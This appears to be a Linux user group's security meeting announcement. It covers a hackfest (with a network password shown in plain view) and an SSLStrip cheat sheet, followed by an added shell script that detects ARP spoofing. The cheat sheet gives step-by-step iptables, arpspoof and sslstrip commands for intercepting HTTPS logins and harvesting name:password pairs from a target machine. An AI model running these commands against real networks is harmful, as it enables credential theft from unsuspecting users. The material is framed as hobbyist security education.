Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com http://plug.phoenix.az.us

Hayst.ac Firefox Browser PlugIn

David Huerta will be showcasing hayst.ac - his Firefox Security Plugin; just one of the many Haystack Projects:

After arriving in Arizona from the posh, cosmopolitan enclave of southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in 2003, originally a student organization that drew members and activities from the greater West Valley Free software community, including students at GCC and ASU West. He is also the founder of Hayst.ac, a web history obfuscation system, and serves on the board of directors for HeatSync Labs, a hackerspace in Chandler.

Hamachi/LogMeIn HackFests

Saturday 19th of January, 2011, Hamachi network hackfest:
DO NOT CONNECT TO THIS NETWORK UNLESS YOU ARE CERTAIN OF YOUR SECURITY!
hackfest password = trustme
Hackfest ends on Sunday at 22:00. Have fun!

If you bring your laptop to open hackfest labs and join any fest network, you might want to disable the hard drive (plan on being able to use live CDs or a USB jump drive). Gangplank's open network offers unlimited Wi-Fi for research and acceptable-use shared community access (no cracking).

Other Work:

Rebuild old Linux system (with radius for enterprise-WPA2) into gPXE for imaging (Just like we did for Installfest):

Add a puppet cfengine process to maintain our configuration files even after <s>edited</s> hacked.

Just Like Ferengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
    * Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie Marlinspike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and nat;

    # cat /proc/sys/net/ipv4/ip_forward

    * 0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward

    * 1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to default interface gateway (and target machine)

    # arpspoof -i eth0 -t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip -l 8080

* Open Browser  -  Go Login to SSL https://Gmail.com (for instance)

# tail -f sslstrip.log

You will log the name:password pairs for each site visited from the proxy.

As you can see, the default gateway and target machine can be seasoned to taste.

./sslstrip -h

------------------------------------end SHEETCHEAT
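For anyone joining a fest network, a defender-side check for the arpspoof step in the cheat sheet (an added example, not part of the original cheat sheet or of sslstrip): it reads an ARP table in Linux /proc/net/arp format and flags any MAC address that answers for more than one IP, which is what the target machine sees once its gateway entry has been spoofed. The function name, the 192.168.1.50 host and all MAC addresses are constructed for illustration; the .231 and .244 addresses are the ones used above.

```shell
#!/bin/sh
# find_shared_macs: read an ARP table (Linux /proc/net/arp format) on stdin.
# Prints "<mac> <ip1>,<ip2>,..." for every MAC claimed by two or more IPs.
# Returns 1 if any shared MAC is found, 0 if the table looks clean.
# Note: a router with several addresses or proxy ARP can also share a MAC,
# so treat a hit as something to investigate, not as proof.
find_shared_macs() {
    awk '
        NR == 1 { next }                     # skip the column header row
        $4 == "00:00:00:00:00:00" { next }   # skip incomplete entries
        {
            mac = tolower($4)
            if (!(mac in ips)) { order[++n] = mac; ips[mac] = $1; count[mac] = 1 }
            else               { ips[mac] = ips[mac] "," $1; count[mac]++ }
        }
        END {
            for (i = 1; i <= n; i++)
                if (count[order[i]] > 1) { print order[i], ips[order[i]]; bad = 1 }
            exit (bad ? 1 : 0)
        }
    '
}

# Constructed sample: ARP table on the target (192.168.1.231) while spoofed.
# The gateway 192.168.1.244 now resolves to the same MAC as 192.168.1.50.
SAMPLE_POISONED='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.244    0x1         0x2         02:00:00:aa:bb:cc     *        eth0
192.168.1.50     0x1         0x2         02:00:00:aa:bb:cc     *        eth0
192.168.1.20     0x1         0x2         02:00:00:11:22:33     *        eth0
192.168.1.99     0x1         0x0         00:00:00:00:00:00     *        eth0'

# Constructed sample: the same table before spoofing.
SAMPLE_CLEAN='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.244    0x1         0x2         02:00:00:dd:ee:ff     *        eth0
192.168.1.50     0x1         0x2         02:00:00:aa:bb:cc     *        eth0
192.168.1.20     0x1         0x2         02:00:00:11:22:33     *        eth0'

# Demo on the constructed data; on a live Linux host run:
#   find_shared_macs < /proc/net/arp
printf '%s\n' "$SAMPLE_POISONED" | find_shared_macs \
    || echo "WARNING: one MAC is answering for several IPs (possible ARP spoofing)"
printf '%s\n' "$SAMPLE_CLEAN" | find_shared_macs \
    && echo "clean sample: no shared MACs"
```

If the gateway shows up in the output, compare its MAC against the value recorded before joining the network.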

 http://www.obnosis.com

Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!


















--
(503) 754-4452
(623) 688-3392
